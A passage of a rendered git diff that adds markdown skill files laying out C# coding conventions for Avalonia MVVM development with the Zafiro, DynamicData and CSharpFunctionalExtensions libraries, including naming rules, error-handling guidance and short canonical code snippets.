- **Pure ViewModels**: ViewModels must **never** reference Avalonia types.
|
||||
- **Bindings Over Code-Behind**: Logic should be driven by bindings.
|
||||
- **DataTemplates**: Prefer explicit `DataTemplate`s and typed `DataContext`s.
|
||||
- **VisualStates**: Avoid using `VisualStates` unless absolutely required.
|
||||
|
||||
## Zafiro Guidelines
|
||||
|
||||
- **Prefer Abstractions**: Always look for existing Zafiro helpers, extension methods, and abstractions before re-implementing logic.
|
||||
- **Validation**: Use Zafiro's `ValidationRule` and validation extensions instead of ad-hoc reactive logic.
|
||||
|
||||
## DynamicData & Reactive Rules
|
||||
|
||||
### The Mandatory Approach
|
||||
|
||||
- **Operator Preference**: Always prefer **DynamicData** operators (`Connect`, `Filter`, `Transform`, `Sort`, `Bind`, `DisposeMany`) over plain Rx operators when working with collections.
|
||||
- **Readable Pipelines**: Build and maintain pipelines as a single, readable chain.
|
||||
- **Lifecycle**: Use `DisposeWith` for lifecycle management.
|
||||
- **Minimal Subscriptions**: Subscriptions should be minimal, centralized, and strictly for side-effects.
|
||||
|
||||
### Forbidden Anti-Patterns
|
||||
|
||||
- **Ad-hoc Sources**: Do NOT create new `SourceList` / `SourceCache` on the fly for local problems.
|
||||
- **Logic in Subscribe**: Do NOT place business logic inside `Subscribe`.
|
||||
- **Operator Mismatch**: Do NOT use `System.Reactive` operators if a DynamicData equivalent exists.
|
||||
|
||||
### Canonical Patterns
|
||||
|
||||
**Validation of Dynamic Collections:**
|
||||
```csharp
|
||||
this.ValidationRule(
|
||||
StagesSource
|
||||
.Connect()
|
||||
.FilterOnObservable(stage => stage.IsValid)
|
||||
.IsEmpty(),
|
||||
b => !b,
|
||||
_ => "Stages are not valid")
|
||||
.DisposeWith(Disposables);
|
||||
```
|
||||
|
||||
**Filtering Nulls:**
|
||||
Use `WhereNotNull()` in reactive pipelines.
|
||||
```csharp
|
||||
this.WhenAnyValue(x => x.DurationPreset).WhereNotNull()
|
||||
```
|
||||
@ -0,0 +1,19 @@
|
||||
# Core Technical Skills & Architecture
|
||||
|
||||
## Mandatory Expertise
|
||||
|
||||
The developer must possess strong expertise in:
|
||||
- **C# and modern .NET**: Utilizing the latest features of the language and framework.
|
||||
- **Avalonia UI**: For cross-platform UI development.
|
||||
- **MVVM Architecture**: Maintaining strict separation between UI and business logic.
|
||||
- **Clean Code & Clean Architecture**: Focusing on maintainability and inward dependency flow.
|
||||
- **Functional Programming in C#**: Embracing immutability and functional patterns.
|
||||
- **Reactive Programming**: Expertise in DynamicData and System.Reactive.
|
||||
|
||||
## Architectural Principles
|
||||
|
||||
- **Pure MVVM**: Mandatory for all UI code. Logic must be independent of UI concerns.
|
||||
- **Composition over Inheritance**: Favor modular building blocks over deep inheritance hierarchies.
|
||||
- **Inward Dependency Flow**: Abstractions must not depend on implementations.
|
||||
- **Immutability**: Prefer immutable structures where practical to ensure predictability.
|
||||
- **Stable Public APIs**: Design APIs carefully to ensure long-term stability and clarity.
|
||||
@ -0,0 +1,15 @@
|
||||
# Naming & Coding Standards
|
||||
|
||||
## General Standards
|
||||
|
||||
- **Explicit Names**: Favor clarity over cleverness.
|
||||
- **Async Suffix**: Do **NOT** use the `Async` suffix in method names, even if they return `Task`.
|
||||
- **Private Fields**: Do **NOT** use the `_` prefix for private fields.
|
||||
- **Static State**: Avoid static state unless explicitly justified and documented.
|
||||
- **Method Design**: Keep methods small, expressive, and with low cyclomatic complexity.
|
||||
|
||||
## Error Handling
|
||||
|
||||
- **Result & Maybe**: Use types from **CSharpFunctionalExtensions** for flow control and error handling.
|
||||
- **Exceptions**: Reserved strictly for truly exceptional, unrecoverable situations.
|
||||
- **Boundaries**: Never allow exceptions to leak across architectural boundaries.
|
||||
45
packages/llm/skills/avalonia-zafiro-development/patterns.md
Normal file
45
packages/llm/skills/avalonia-zafiro-development/patterns.md
Normal file
@ -0,0 +1,45 @@
|
||||
# Common Patterns in Angor/Zafiro
|
||||
|
||||
## Refreshable Collections
|
||||
|
||||
The `RefreshableCollection` pattern is used to manage lists that can be refreshed via a command, maintaining an internal `SourceCache`/`SourceList` and exposing a `ReadOnlyObservableCollection`.
|
||||
|
||||
### Implementation
|
||||
|
||||
```csharp
|
||||
var refresher = RefreshableCollection.Create(
|
||||
() => GetDataTask(),
|
||||
model => model.Id)
|
||||
.DisposeWith(disposable);
|
||||
|
||||
LoadData = refresher.Refresh;
|
||||
Items = refresher.Items;
|
||||
```
|
||||
|
||||
### Benefits
|
||||
- **Automatic Loading**: Handles the command execution and results.
|
||||
- **Efficient Updates**: Uses `EditDiff` internally to update items without clearing the list.
|
||||
- **UI Friendly**: Exposes `Items` as a `ReadOnlyObservableCollection` suitable for binding.
|
||||
|
||||
## Mandatory Validation Pattern
|
||||
|
||||
When validating dynamic collections, always use the Zafiro validation extension:
|
||||
|
||||
```csharp
|
||||
this.ValidationRule(
|
||||
StagesSource
|
||||
.Connect()
|
||||
.FilterOnObservable(stage => stage.IsValid)
|
||||
.IsEmpty(),
|
||||
b => !b,
|
||||
_ => "Stages are not valid")
|
||||
.DisposeWith(Disposables);
|
||||
```
|
||||
|
||||
## Error Handling Pipeline
|
||||
|
||||
Instead of manual `Subscribe`, use `HandleErrorsWith` to pipe errors directly to the user:
|
||||
|
||||
```csharp
|
||||
LoadProjects.HandleErrorsWith(uiServices.NotificationService, "Could not load projects");
|
||||
```
|
||||
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user